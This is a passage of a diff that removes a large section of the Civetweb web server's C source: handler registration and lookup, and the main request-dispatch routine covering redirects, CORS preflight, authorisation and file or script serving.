-		          (conn->request_info.query_string == NULL) ? "" : "?",
-		          (conn->request_info.query_string == NULL)
-		              ? ""
-		              : conn->request_info.query_string);
-	}
-}
-
-
-static void
-mg_set_handler_type(struct mg_context *ctx,
-                    const char *uri,
-                    int handler_type,
-                    int is_delete_request,
-                    mg_request_handler handler,
-                    struct mg_websocket_subprotocols *subprotocols,
-                    mg_websocket_connect_handler connect_handler,
-                    mg_websocket_ready_handler ready_handler,
-                    mg_websocket_data_handler data_handler,
-                    mg_websocket_close_handler close_handler,
-                    mg_authorization_handler auth_handler,
-                    void *cbdata)
-{
-	struct mg_handler_info *tmp_rh, **lastref;
-	size_t urilen = strlen(uri);
-
-	if (handler_type == WEBSOCKET_HANDLER) {
-		/* assert(handler == NULL); */
-		/* assert(is_delete_request || connect_handler!=NULL ||
-		 *        ready_handler!=NULL || data_handler!=NULL ||
-		 *        close_handler!=NULL);
-		 */
-		/* assert(auth_handler == NULL); */
-		if (handler != NULL) {
-			return;
-		}
-		if (!is_delete_request && (connect_handler == NULL)
-		    && (ready_handler == NULL) && (data_handler == NULL)
-		    && (close_handler == NULL)) {
-			return;
-		}
-		if (auth_handler != NULL) {
-			return;
-		}
-	} else if (handler_type == REQUEST_HANDLER) {
-		/* assert(connect_handler==NULL && ready_handler==NULL &&
-		 *        data_handler==NULL && close_handler==NULL); */
-		/* assert(is_delete_request || (handler!=NULL));
-		 */
-		/* assert(auth_handler == NULL); */
-		if ((connect_handler != NULL) || (ready_handler != NULL)
-		    || (data_handler != NULL) || (close_handler != NULL)) {
-			return;
-		}
-		if (!is_delete_request && (handler == NULL)) {
-			return;
-		}
-		if (auth_handler != NULL) {
-			return;
-		}
-	} else { /* AUTH_HANDLER */
-		     /* assert(handler == NULL); */
-		     /* assert(connect_handler==NULL && ready_handler==NULL &&
-		      *        data_handler==NULL && close_handler==NULL); */
-		/* assert(auth_handler != NULL); */
-		if (handler != NULL) {
-			return;
-		}
-		if ((connect_handler != NULL) || (ready_handler != NULL)
-		    || (data_handler != NULL) || (close_handler != NULL)) {
-			return;
-		}
-		if (!is_delete_request && (auth_handler == NULL)) {
-			return;
-		}
-	}
-
-	if (!ctx) {
-		return;
-	}
-
-	mg_lock_context(ctx);
-
-	/* first try to find an existing handler */
-	lastref = &(ctx->handlers);
-	for (tmp_rh = ctx->handlers; tmp_rh != NULL; tmp_rh = tmp_rh->next) {
-		if (tmp_rh->handler_type == handler_type) {
-			if ((urilen == tmp_rh->uri_len) && !strcmp(tmp_rh->uri, uri)) {
-				if (!is_delete_request) {
-					/* update existing handler */
-					if (handler_type == REQUEST_HANDLER) {
-						tmp_rh->handler = handler;
-					} else if (handler_type == WEBSOCKET_HANDLER) {
-						tmp_rh->subprotocols = subprotocols;
-						tmp_rh->connect_handler = connect_handler;
-						tmp_rh->ready_handler = ready_handler;
-						tmp_rh->data_handler = data_handler;
-						tmp_rh->close_handler = close_handler;
-					} else { /* AUTH_HANDLER */
-						tmp_rh->auth_handler = auth_handler;
-					}
-					tmp_rh->cbdata = cbdata;
-				} else {
-					/* remove existing handler */
-					*lastref = tmp_rh->next;
-					mg_free(tmp_rh->uri);
-					mg_free(tmp_rh);
-				}
-				mg_unlock_context(ctx);
-				return;
-			}
-		}
-		lastref = &(tmp_rh->next);
-	}
-
-	if (is_delete_request) {
-		/* no handler to set, this was a remove request to a non-existing
-		 * handler */
-		mg_unlock_context(ctx);
-		return;
-	}
-
-	tmp_rh =
-	    (struct mg_handler_info *)mg_calloc_ctx(sizeof(struct mg_handler_info),
-	                                            1,
-	                                            ctx);
-	if (tmp_rh == NULL) {
-		mg_unlock_context(ctx);
-		mg_cry(fc(ctx), "%s", "Cannot create new request handler struct, OOM");
-		return;
-	}
-	tmp_rh->uri = mg_strdup(uri);
-	if (!tmp_rh->uri) {
-		mg_unlock_context(ctx);
-		mg_free(tmp_rh);
-		mg_cry(fc(ctx), "%s", "Cannot create new request handler struct, OOM");
-		return;
-	}
-	tmp_rh->uri_len = urilen;
-	if (handler_type == REQUEST_HANDLER) {
-		tmp_rh->handler = handler;
-	} else if (handler_type == WEBSOCKET_HANDLER) {
-		tmp_rh->subprotocols = subprotocols;
-		tmp_rh->connect_handler = connect_handler;
-		tmp_rh->ready_handler = ready_handler;
-		tmp_rh->data_handler = data_handler;
-		tmp_rh->close_handler = close_handler;
-	} else { /* AUTH_HANDLER */
-		tmp_rh->auth_handler = auth_handler;
-	}
-	tmp_rh->cbdata = cbdata;
-	tmp_rh->handler_type = handler_type;
-	tmp_rh->next = NULL;
-
-	*lastref = tmp_rh;
-	mg_unlock_context(ctx);
-}
-
-
-void
-mg_set_request_handler(struct mg_context *ctx,
-                       const char *uri,
-                       mg_request_handler handler,
-                       void *cbdata)
-{
-	mg_set_handler_type(ctx,
-	                    uri,
-	                    REQUEST_HANDLER,
-	                    handler == NULL,
-	                    handler,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    cbdata);
-}
-
-
-void
-mg_set_websocket_handler(struct mg_context *ctx,
-                         const char *uri,
-                         mg_websocket_connect_handler connect_handler,
-                         mg_websocket_ready_handler ready_handler,
-                         mg_websocket_data_handler data_handler,
-                         mg_websocket_close_handler close_handler,
-                         void *cbdata)
-{
-	mg_set_websocket_handler_with_subprotocols(ctx,
-	                                           uri,
-	                                           NULL,
-	                                           connect_handler,
-	                                           ready_handler,
-	                                           data_handler,
-	                                           close_handler,
-	                                           cbdata);
-}
-
-
-void
-mg_set_websocket_handler_with_subprotocols(
-    struct mg_context *ctx,
-    const char *uri,
-    struct mg_websocket_subprotocols *subprotocols,
-    mg_websocket_connect_handler connect_handler,
-    mg_websocket_ready_handler ready_handler,
-    mg_websocket_data_handler data_handler,
-    mg_websocket_close_handler close_handler,
-    void *cbdata)
-{
-	int is_delete_request = (connect_handler == NULL) && (ready_handler == NULL)
-	                        && (data_handler == NULL)
-	                        && (close_handler == NULL);
-	mg_set_handler_type(ctx,
-	                    uri,
-	                    WEBSOCKET_HANDLER,
-	                    is_delete_request,
-	                    NULL,
-	                    subprotocols,
-	                    connect_handler,
-	                    ready_handler,
-	                    data_handler,
-	                    close_handler,
-	                    NULL,
-	                    cbdata);
-}
-
-
-void
-mg_set_auth_handler(struct mg_context *ctx,
-                    const char *uri,
-                    mg_request_handler handler,
-                    void *cbdata)
-{
-	mg_set_handler_type(ctx,
-	                    uri,
-	                    AUTH_HANDLER,
-	                    handler == NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    handler,
-	                    cbdata);
-}
-
-
-static int
-get_request_handler(struct mg_connection *conn,
-                    int handler_type,
-                    mg_request_handler *handler,
-                    struct mg_websocket_subprotocols **subprotocols,
-                    mg_websocket_connect_handler *connect_handler,
-                    mg_websocket_ready_handler *ready_handler,
-                    mg_websocket_data_handler *data_handler,
-                    mg_websocket_close_handler *close_handler,
-                    mg_authorization_handler *auth_handler,
-                    void **cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	if (request_info) {
-		const char *uri = request_info->local_uri;
-		size_t urilen = strlen(uri);
-		struct mg_handler_info *tmp_rh;
-
-		if (!conn || !conn->ctx) {
-			return 0;
-		}
-
-		mg_lock_context(conn->ctx);
-
-		/* first try for an exact match */
-		for (tmp_rh = conn->ctx->handlers; tmp_rh != NULL;
-		     tmp_rh = tmp_rh->next) {
-			if (tmp_rh->handler_type == handler_type) {
-				if ((urilen == tmp_rh->uri_len) && !strcmp(tmp_rh->uri, uri)) {
-					if (handler_type == WEBSOCKET_HANDLER) {
-						*subprotocols = tmp_rh->subprotocols;
-						*connect_handler = tmp_rh->connect_handler;
-						*ready_handler = tmp_rh->ready_handler;
-						*data_handler = tmp_rh->data_handler;
-						*close_handler = tmp_rh->close_handler;
-					} else if (handler_type == REQUEST_HANDLER) {
-						*handler = tmp_rh->handler;
-					} else { /* AUTH_HANDLER */
-						*auth_handler = tmp_rh->auth_handler;
-					}
-					*cbdata = tmp_rh->cbdata;
-					mg_unlock_context(conn->ctx);
-					return 1;
-				}
-			}
-		}
-
-		/* next try for a partial match, we will accept uri/something */
-		for (tmp_rh = conn->ctx->handlers; tmp_rh != NULL;
-		     tmp_rh = tmp_rh->next) {
-			if (tmp_rh->handler_type == handler_type) {
-				if ((tmp_rh->uri_len < urilen) && (uri[tmp_rh->uri_len] == '/')
-				    && (memcmp(tmp_rh->uri, uri, tmp_rh->uri_len) == 0)) {
-					if (handler_type == WEBSOCKET_HANDLER) {
-						*subprotocols = tmp_rh->subprotocols;
-						*connect_handler = tmp_rh->connect_handler;
-						*ready_handler = tmp_rh->ready_handler;
-						*data_handler = tmp_rh->data_handler;
-						*close_handler = tmp_rh->close_handler;
-					} else if (handler_type == REQUEST_HANDLER) {
-						*handler = tmp_rh->handler;
-					} else { /* AUTH_HANDLER */
-						*auth_handler = tmp_rh->auth_handler;
-					}
-					*cbdata = tmp_rh->cbdata;
-					mg_unlock_context(conn->ctx);
-					return 1;
-				}
-			}
-		}
-
-		/* finally try for pattern match */
-		for (tmp_rh = conn->ctx->handlers; tmp_rh != NULL;
-		     tmp_rh = tmp_rh->next) {
-			if (tmp_rh->handler_type == handler_type) {
-				if (match_prefix(tmp_rh->uri, tmp_rh->uri_len, uri) > 0) {
-					if (handler_type == WEBSOCKET_HANDLER) {
-						*subprotocols = tmp_rh->subprotocols;
-						*connect_handler = tmp_rh->connect_handler;
-						*ready_handler = tmp_rh->ready_handler;
-						*data_handler = tmp_rh->data_handler;
-						*close_handler = tmp_rh->close_handler;
-					} else if (handler_type == REQUEST_HANDLER) {
-						*handler = tmp_rh->handler;
-					} else { /* AUTH_HANDLER */
-						*auth_handler = tmp_rh->auth_handler;
-					}
-					*cbdata = tmp_rh->cbdata;
-					mg_unlock_context(conn->ctx);
-					return 1;
-				}
-			}
-		}
-
-		mg_unlock_context(conn->ctx);
-	}
-	return 0; /* none found */
-}
-
-
-/* Check if the script file is in a path, allowed for script files.
- * This can be used if uploading files is possible not only for the server
- * admin, and the upload mechanism does not check the file extension.
- */
-static int
-is_in_script_path(const struct mg_connection *conn, const char *path)
-{
-	/* TODO (Feature): Add config value for allowed script path.
-	 * Default: All allowed. */
-	(void)conn;
-	(void)path;
-	return 1;
-}
-
-
-#if defined(USE_WEBSOCKET) && defined(MG_LEGACY_INTERFACE)
-static int
-deprecated_websocket_connect_wrapper(const struct mg_connection *conn,
-                                     void *cbdata)
-{
-	struct mg_callbacks *pcallbacks = (struct mg_callbacks *)cbdata;
-	if (pcallbacks->websocket_connect) {
-		return pcallbacks->websocket_connect(conn);
-	}
-	/* No handler set - assume "OK" */
-	return 0;
-}
-
-
-static void
-deprecated_websocket_ready_wrapper(struct mg_connection *conn, void *cbdata)
-{
-	struct mg_callbacks *pcallbacks = (struct mg_callbacks *)cbdata;
-	if (pcallbacks->websocket_ready) {
-		pcallbacks->websocket_ready(conn);
-	}
-}
-
-
-static int
-deprecated_websocket_data_wrapper(struct mg_connection *conn,
-                                  int bits,
-                                  char *data,
-                                  size_t len,
-                                  void *cbdata)
-{
-	struct mg_callbacks *pcallbacks = (struct mg_callbacks *)cbdata;
-	if (pcallbacks->websocket_data) {
-		return pcallbacks->websocket_data(conn, bits, data, len);
-	}
-	/* No handler set - assume "OK" */
-	return 1;
-}
-#endif
-
-
-/* This is the heart of the Civetweb's logic.
- * This function is called when the request is read, parsed and validated,
- * and Civetweb must decide what action to take: serve a file, or
- * a directory, or call embedded function, etcetera. */
-static void
-handle_request(struct mg_connection *conn)
-{
-	struct mg_request_info *ri = &conn->request_info;
-	char path[PATH_MAX];
-	int uri_len, ssl_index;
-	int is_found = 0, is_script_resource = 0, is_websocket_request = 0,
-	    is_put_or_delete_request = 0, is_callback_resource = 0;
-	int i;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	mg_request_handler callback_handler = NULL;
-	struct mg_websocket_subprotocols *subprotocols;
-	mg_websocket_connect_handler ws_connect_handler = NULL;
-	mg_websocket_ready_handler ws_ready_handler = NULL;
-	mg_websocket_data_handler ws_data_handler = NULL;
-	mg_websocket_close_handler ws_close_handler = NULL;
-	void *callback_data = NULL;
-	mg_authorization_handler auth_handler = NULL;
-	void *auth_callback_data = NULL;
-	int handler_type;
-	time_t curtime = time(NULL);
-	char date[64];
-
-	path[0] = 0;
-
-	/* 1. get the request url */
-	/* 1.1. split into url and query string */
-	if ((conn->request_info.query_string = strchr(ri->request_uri, '?'))
-	    != NULL) {
-		*((char *)conn->request_info.query_string++) = '\0';
-	}
-
-	/* 1.2. do a https redirect, if required. Do not decode URIs yet. */
-	if (!conn->client.is_ssl && conn->client.ssl_redir) {
-		ssl_index = get_first_ssl_listener_index(conn->ctx);
-		if (ssl_index >= 0) {
-			redirect_to_https_port(conn, ssl_index);
-		} else {
-			/* A http to https forward port has been specified,
-			 * but no https port to forward to. */
-			mg_send_http_error(conn,
-			                   503,
-			                   "%s",
-			                   "Error: SSL forward not configured properly");
-			mg_cry(conn, "Can not redirect to SSL, no SSL port available");
-		}
-		return;
-	}
-	uri_len = (int)strlen(ri->local_uri);
-
-	/* 1.3. decode url (if config says so) */
-	if (should_decode_url(conn)) {
-		mg_url_decode(
-		    ri->local_uri, uri_len, (char *)ri->local_uri, uri_len + 1, 0);
-	}
-
-	/* 1.4. clean URIs, so a path like allowed_dir/../forbidden_file is
-	 * not possible */
-	remove_double_dots_and_double_slashes((char *)ri->local_uri);
-
-	/* step 1. completed, the url is known now */
-	uri_len = (int)strlen(ri->local_uri);
-	DEBUG_TRACE("URL: %s", ri->local_uri);
-
-	/* 2. if this ip has limited speed, set it for this connection */
-	conn->throttle = set_throttle(conn->ctx->config[THROTTLE],
-	                              get_remote_ip(conn),
-	                              ri->local_uri);
-
-	/* 3. call a "handle everything" callback, if registered */
-	if (conn->ctx->callbacks.begin_request != NULL) {
-		/* Note that since V1.7 the "begin_request" function is called
-		 * before an authorization check. If an authorization check is
-		 * required, use a request_handler instead. */
-		i = conn->ctx->callbacks.begin_request(conn);
-		if (i > 0) {
-			/* callback already processed the request. Store the
-			   return value as a status code for the access log. */
-			conn->status_code = i;
-			discard_unread_request_data(conn);
-			return;
-		} else if (i == 0) {
-			/* civetweb should process the request */
-		} else {
-			/* unspecified - may change with the next version */
-			return;
-		}
-	}
-
-	/* request not yet handled by a handler or redirect, so the request
-	 * is processed here */
-
-	/* 4. Check for CORS preflight requests and handle them (if configured).
-	 * https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
-	 */
-	if (!strcmp(ri->request_method, "OPTIONS")) {
-		/* Send a response to CORS preflights only if
-		 * access_control_allow_methods is not NULL and not an empty string.
-		 * In this case, scripts can still handle CORS. */
-		const char *cors_meth_cfg =
-		    conn->ctx->config[ACCESS_CONTROL_ALLOW_METHODS];
-		const char *cors_orig_cfg =
-		    conn->ctx->config[ACCESS_CONTROL_ALLOW_ORIGIN];
-		const char *cors_origin =
-		    get_header(ri->http_headers, ri->num_headers, "Origin");
-		const char *cors_acrm = get_header(ri->http_headers,
-		                                   ri->num_headers,
-		                                   "Access-Control-Request-Method");
-
-		/* Todo: check if cors_origin is in cors_orig_cfg.
-		 * Or, let the client check this. */
-
-		if ((cors_meth_cfg != NULL) && (*cors_meth_cfg != 0)
-		    && (cors_orig_cfg != NULL) && (*cors_orig_cfg != 0)
-		    && (cors_origin != NULL) && (cors_acrm != NULL)) {
-			/* This is a valid CORS preflight, and the server is configured
-			 * to
-			 * handle it automatically. */
-			const char *cors_acrh =
-			    get_header(ri->http_headers,
-			               ri->num_headers,
-			               "Access-Control-Request-Headers");
-
-			gmt_time_string(date, sizeof(date), &curtime);
-			mg_printf(conn,
-			          "HTTP/1.1 200 OK\r\n"
-			          "Date: %s\r\n"
-			          "Access-Control-Allow-Origin: %s\r\n"
-			          "Access-Control-Allow-Methods: %s\r\n"
-			          "Content-Length: 0\r\n"
-			          "Connection: %s\r\n",
-			          date,
-			          cors_orig_cfg,
-			          ((cors_meth_cfg[0] == '*') ? cors_acrm : cors_meth_cfg),
-			          suggest_connection_header(conn));
-
-			if (cors_acrh != NULL) {
-				/* CORS request is asking for additional headers */
-				const char *cors_hdr_cfg =
-				    conn->ctx->config[ACCESS_CONTROL_ALLOW_HEADERS];
-
-				if ((cors_hdr_cfg != NULL) && (*cors_hdr_cfg != 0)) {
-					/* Allow only if access_control_allow_headers is
-					 * not NULL and not an empty string. If this
-					 * configuration is set to *, allow everything.
-					 * Otherwise this configuration must be a list
-					 * of allowed HTTP header names. */
-					mg_printf(conn,
-					          "Access-Control-Allow-Headers: %s\r\n",
-					          ((cors_hdr_cfg[0] == '*') ? cors_acrh
-					                                    : cors_hdr_cfg));
-				}
-			}
-			mg_printf(conn, "Access-Control-Max-Age: 60\r\n");
-
-			mg_printf(conn, "\r\n");
-			return;
-		}
-	}
-
-	/* 5. interpret the url to find out how the request must be handled
-	 */
-	/* 5.1. first test, if the request targets the regular http(s)://
-	 * protocol namespace or the websocket ws(s):// protocol namespace.
-	 */
-	is_websocket_request = is_websocket_protocol(conn);
-#if defined(USE_WEBSOCKET)
-	handler_type = is_websocket_request ? WEBSOCKET_HANDLER : REQUEST_HANDLER;
-#else
-	handler_type = REQUEST_HANDLER;
-#endif /* defined(USE_WEBSOCKET) */
-	/* 5.2. check if the request will be handled by a callback */
-	if (get_request_handler(conn,
-	                        handler_type,
-	                        &callback_handler,
-	                        &subprotocols,
-	                        &ws_connect_handler,
-	                        &ws_ready_handler,
-	                        &ws_data_handler,
-	                        &ws_close_handler,
-	                        NULL,
-	                        &callback_data)) {
-		/* 5.2.1. A callback will handle this request. All requests
-		 * handled
-		 * by a callback have to be considered as requests to a script
-		 * resource. */
-		is_callback_resource = 1;
-		is_script_resource = 1;
-		is_put_or_delete_request = is_put_or_delete_method(conn);
-	} else {
-	no_callback_resource:
-		/* 5.2.2. No callback is responsible for this request. The URI
-		 * addresses a file based resource (static content or Lua/cgi
-		 * scripts in the file system). */
-		is_callback_resource = 0;
-		interpret_uri(conn,
-		              path,
-		              sizeof(path),
-		              &file.stat,
-		              &is_found,
-		              &is_script_resource,
-		              &is_websocket_request,
-		              &is_put_or_delete_request);
-	}
-
-	/* 6. authorization check */
-	/* 6.1. a custom authorization handler is installed */
-	if (get_request_handler(conn,
-	                        AUTH_HANDLER,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        &auth_handler,
-	                        &auth_callback_data)) {
-		if (!auth_handler(conn, auth_callback_data)) {
-			return;
-		}
-	} else if (is_put_or_delete_request && !is_script_resource
-	           && !is_callback_resource) {
-/* 6.2. this request is a PUT/DELETE to a real file */
-/* 6.2.1. thus, the server must have real files */
-#if defined(NO_FILES)
-		if (1) {
-#else
-		if (conn->ctx->config[DOCUMENT_ROOT] == NULL) {
-#endif
-			/* This server does not have any real files, thus the
-			 * PUT/DELETE methods are not valid. */
-			mg_send_http_error(conn,
-			                   405,
-			                   "%s method not allowed",
-			                   conn->request_info.request_method);
-			return;
-		}
-
-#if !defined(NO_FILES)
-		/* 6.2.2. Check if put authorization for static files is
-		 * available.
-		 */
-		if (!is_authorized_for_put(conn)) {
-			send_authorization_request(conn, NULL);
-			return;
-		}
-#endif
-
-	} else {
-		/* 6.3. This is either a OPTIONS, GET, HEAD or POST request,
-		 * or it is a PUT or DELETE request to a resource that does not
-		 * correspond to a file. Check authorization. */
-		if (!check_authorization(conn, path)) {
-			send_authorization_request(conn, NULL);
-			return;
-		}
-	}
-
-	/* request is authorized or does not need authorization */
-
-	/* 7. check if there are request handlers for this uri */
-	if (is_callback_resource) {
-		if (!is_websocket_request) {
-			i = callback_handler(conn, callback_data);
-			if (i > 0) {
-				/* Do nothing, callback has served the request. Store
-				 * then return value as status code for the log and discard
-				 * all data from the client not used by the callback. */
-				conn->status_code = i;
-				discard_unread_request_data(conn);
-			} else {
-				/* The handler did NOT handle the request. */
-				/* Some proper reactions would be:
-				 * a) close the connections without sending anything
-				 * b) send a 404 not found
-				 * c) try if there is a file matching the URI
-				 * It would be possible to do a, b or c in the callback
-				 * implementation, and return 1 - we cannot do anything
-				 * here, that is not possible in the callback.
-				 *
-				 * TODO: What would be the best reaction here?
-				 * (Note: The reaction may change, if there is a better
-				 *idea.)
-				 */
-
-				/* For the moment, use option c: We look for a proper file,
-				 * but since a file request is not always a script resource,
-				 * the authorization check might be different. */
-				interpret_uri(conn,
-				              path,
-				              sizeof(path),
-				              &file.stat,
-				              &is_found,
-				              &is_script_resource,
-				              &is_websocket_request,
-				              &is_put_or_delete_request);
-				callback_handler = NULL;
-
-				/* Here we are at a dead end:
-				 * According to URI matching, a callback should be
-				 * responsible for handling the request,
-				 * we called it, but the callback declared itself
-				 * not responsible.
-				 * We use a goto here, to get out of this dead end,
-				 * and continue with the default handling.
-				 * A goto here is simpler and better to understand
-				 * than some curious loop. */
-				goto no_callback_resource;
-			}
-		} else {
-#if defined(USE_WEBSOCKET)
-			handle_websocket_request(conn,
-			                         path,
-			                         is_callback_resource,
-			                         subprotocols,
-			                         ws_connect_handler,
-			                         ws_ready_handler,
-			                         ws_data_handler,
-			                         ws_close_handler,
-			                         callback_data);
-#endif
-		}
-		return;
-	}
-
-/* 8. handle websocket requests */
-#if defined(USE_WEBSOCKET)
-	if (is_websocket_request) {
-		if (is_script_resource) {
-
-			if (is_in_script_path(conn, path)) {
-				/* Websocket Lua script */
-				handle_websocket_request(conn,
-				                         path,
-				                         0 /* Lua Script */,
-				                         NULL,
-				                         NULL,
-				                         NULL,
-				                         NULL,
-				                         NULL,
-				                         &conn->ctx->callbacks);
-			} else {
-				/* Script was in an illegal path */
-				mg_send_http_error(conn, 403, "%s", "Forbidden");
-			}
-		} else {
-#if defined(MG_LEGACY_INTERFACE)
-			handle_websocket_request(
-			    conn,
-			    path,
-			    !is_script_resource /* could be deprecated global callback */,
-			    NULL,
-			    deprecated_websocket_connect_wrapper,
-			    deprecated_websocket_ready_wrapper,
-			    deprecated_websocket_data_wrapper,
-			    NULL,
-			    &conn->ctx->callbacks);
-#else
-			mg_send_http_error(conn, 404, "%s", "Not found");
-#endif
-		}
-		return;
-	} else
-#endif
-
-#if defined(NO_FILES)
-		/* 9a. In case the server uses only callbacks, this uri is
-		 * unknown.
-		 * Then, all request handling ends here. */
-		mg_send_http_error(conn, 404, "%s", "Not Found");
-
-#else
-	/* 9b. This request is either for a static file or resource handled
-	 * by a script file. Thus, a DOCUMENT_ROOT must exist. */
-	if (conn->ctx->config[DOCUMENT_ROOT] == NULL) {
-		mg_send_http_error(conn, 404, "%s", "Not Found");
-		return;
-	}
-
-	/* 10. Request is handled by a script */
-	if (is_script_resource) {
-		handle_file_based_request(conn, path, &file);
-		return;
-	}
-
-	/* 11. Handle put/delete/mkcol requests */
-	if (is_put_or_delete_request) {
-		/* 11.1. PUT method */
-		if (!strcmp(ri->request_method, "PUT")) {
-			put_file(conn, path);
-			return;
-		}
-		/* 11.2. DELETE method */
-		if (!strcmp(ri->request_method, "DELETE")) {
-			delete_file(conn, path);
-			return;
-		}
-		/* 11.3. MKCOL method */
-		if (!strcmp(ri->request_method, "MKCOL")) {
-			mkcol(conn, path);
-			return;
-		}
-		/* 11.4. PATCH method
-		 * This method is not supported for static resources,
-		 * only for scripts (Lua, CGI) and callbacks. */
-		mg_send_http_error(conn,
-		                   405,
-		                   "%s method not allowed",
-		                   conn->request_info.request_method);
-		return;
-	}
-
-	/* 11. File does not exist, or it was configured that it should be
-	 * hidden */
-	if (!is_found || (must_hide_file(conn, path))) {
-		mg_send_http_error(conn, 404, "%s", "Not found");
-		return;
-	}
-
-	/* 12. Directory uris should end with a slash */
-	if (file.stat.is_directory && (uri_len > 0)
-	    && (ri->local_uri[uri_len - 1] != '/')) {
-		gmt_time_string(date, sizeof(date), &curtime);
-		mg_printf(conn,
-		          "HTTP/1.1 301 Moved Permanently\r\n"
-		          "Location: %s/\r\n"
-		          "Date: %s\r\n"
-		          /* "Cache-Control: private\r\n" (= default) */
-		          "Content-Length: 0\r\n"
-		          "Connection: %s\r\n",
-		          ri->request_uri,
-		          date,
-		          suggest_connection_header(conn));
-		send_additional_header(conn);
-		mg_printf(conn, "\r\n");
-		return;
-	}
-
-	/* 13. Handle other methods than GET/HEAD */
-	/* 13.1. Handle PROPFIND */
-	if (!strcmp(ri->request_method, "PROPFIND")) {
-		handle_propfind(conn, path, &file.stat);
-		return;
-	}
-	/* 13.2. Handle OPTIONS for files */
-	if (!strcmp(ri->request_method, "OPTIONS")) {
-		/* This standard handler is only used for real files.
-		 * Scripts should support the OPTIONS method themselves, to allow a
-		 * maximum flexibility.
-		 * Lua and CGI scripts may fully support CORS this way (including
-		 * preflights). */
-		send_options(conn);
-		return;
-	}
-	/* 13.3. everything but GET and HEAD (e.g. POST) */
-	if ((0 != strcmp(ri->request_method, "GET"))
-	    && (0 != strcmp(ri->request_method, "HEAD"))) {
-		mg_send_http_error(conn,
-		                   405,
-		                   "%s method not allowed",
-		                   conn->request_info.request_method);
-		return;
-	}
-
-	/* 14. directories */
-	if (file.stat.is_directory) {
-		/* Substitute files have already been handled above. */
-		/* Here we can either generate and send a directory listing,
-		 * or send an "access denied" error. */
-		if (!mg_strcasecmp(conn->ctx->config[ENABLE_DIRECTORY_LISTING],
-		                   "yes")) {
-			handle_directory_request(conn, path);
-		} else {
-			mg_send_http_error(conn,
-			                   403,
-			                   "%s",
-			                   "Error: Directory listing denied");
-		}
-		return;
-	}
-
-	handle_file_based_request(conn, path, &file);
-#endif /* !defined(NO_FILES) */
-
-#if 0
-            /* Perform redirect and auth checks before calling begin_request()
-             * handler.
-             * Otherwise, begin_request() would need to perform auth checks and
-             * redirects. */
-#endif
-}
-
-
-static void
-handle_file_based_request(struct mg_connection *conn,
-                          const char *path,
-                          struct mg_file *file)
-{
-	if (!conn || !conn->ctx) {
-		return;
-	}
-
-	if (0) {
-#ifdef USE_LUA
-	} else if (match_prefix(conn->ctx->config[LUA_SERVER_PAGE_EXTENSIONS],
-	                        strlen(
-	                            conn->ctx->config[LUA_SERVER_PAGE_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* Lua server page: an SSI like page containing mostly plain
-			 * html
-			 * code
-			 * plus some tags with server generated contents. */
-			handle_lsp_request(conn, path, file, NULL);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-
-	} else if (match_prefix(conn->ctx->config[LUA_SCRIPT_EXTENSIONS],
-	                        strlen(conn->ctx->config[LUA_SCRIPT_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* Lua in-server module script: a CGI like script used to
-			 * generate
-			 * the
-			 * entire reply. */
-			mg_exec_lua_script(conn, path, NULL);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#endif
-#if defined(USE_DUKTAPE)
-	} else if (match_prefix(conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS],
-	                        strlen(
-	                            conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* Call duktape to generate the page */
-			mg_exec_duktape_script(conn, path);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#endif
-#if !defined(NO_CGI)
-	} else if (match_prefix(conn->ctx->config[CGI_EXTENSIONS],
-	                        strlen(conn->ctx->config[CGI_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* CGI scripts may support all HTTP methods */
-			handle_cgi_request(conn, path);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#endif /* !NO_CGI */
-	} else if (match_prefix(conn->ctx->config[SSI_EXTENSIONS],
-	                        strlen(conn->ctx->config[SSI_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			handle_ssi_file_request(conn, path, file);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#if !defined(NO_CACHING)
-	} else if ((!conn->in_error_handler)
-	           && is_not_modified(conn, &file->stat)) {
-		/* Send 304 "Not Modified" - this must not send any body data */
-		handle_not_modified_static_file_request(conn, file);
-#endif /* !NO_CACHING */
-	} else {
-		handle_static_file_request(conn, path, file, NULL, NULL);
-	}
-}
-
-
-static void
-close_all_listening_sockets(struct mg_context *ctx)
-{
-	unsigned int i;
-	if (!ctx) {
-		return;
-	}
-
-	for (i = 0; i < ctx->num_listening_sockets; i++) {
-		closesocket(ctx->listening_sockets[i].sock);
-		ctx->listening_sockets[i].sock = INVALID_SOCKET;
-	}
-	mg_free(ctx->listening_sockets);
-	ctx->listening_sockets = NULL;
-	mg_free(ctx->listening_socket_fds);
-	ctx->listening_socket_fds = NULL;
-}
-
-
-/* Valid listening port specification is: [ip_address:]port[s]
- * Examples for IPv4: 80, 443s, 127.0.0.1:3128, 192.0.2.3:8080s
- * Examples for IPv6: [::]:80, [::1]:80,
- *   [2001:0db8:7654:3210:FEDC:BA98:7654:3210]:443s
- *   see https://tools.ietf.org/html/rfc3513#section-2.2
- * In order to bind to both, IPv4 and IPv6, you can either add
- * both ports using 8080,[::]:8080, or the short form +8080.
- * Both forms differ in detail: 8080,[::]:8080 create two sockets,
- * one only accepting IPv4 the other only IPv6. +8080 creates
- * one socket accepting IPv4 and IPv6. Depending on the IPv6
- * environment, they might work differently, or might not work
- * at all - it must be tested what options work best in the
- * relevant network environment.
